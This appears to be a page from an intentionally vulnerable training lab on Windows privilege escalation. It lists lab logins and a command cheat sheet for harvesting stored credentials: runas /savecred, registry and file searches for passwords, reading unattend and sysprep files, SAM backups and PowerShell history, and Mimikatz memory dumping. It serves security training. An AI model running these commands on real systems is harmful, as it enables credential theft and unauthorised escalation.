🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
Home Login Unquoted Paths AlwaysInstallElevated Weak Service Perms Token Impersonation DLL Hijacking Stored Credentials
⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

Stored Credentials

PRIVILEGE ESCALATION / LATERAL MOVEMENT 
# Windows stores credentials in multiple places

# 1. Windows Credential Manager
cmdkey /list
# Output might show:
# Target: Domain:interactive=CORP\administrator
# Type: Domain Password
# Use runas to use stored creds without knowing the password:
runas /savecred /user:CORP\administrator "cmd.exe"

# 2. Check for passwords in common locations
dir /s /b *pass* *cred* *vnc* *.config 2>nul
findstr /si password *.xml *.ini *.txt *.config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# 3. Check unattended install files (contain plaintext admin password)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\system32\sysprep\sysprep.xml

# 4. Check for SAM/SYSTEM backup files
dir /s SAM 2>nul
# C:\Windows\Repair\SAM  ← old backup, may be crackable

# 5. PowerShell history file
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Often contains commands with passwords typed in plain text

# 6. Mimikatz — dump all credentials from memory
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
# Dumps NTLM hashes and plaintext passwords for all logged-in users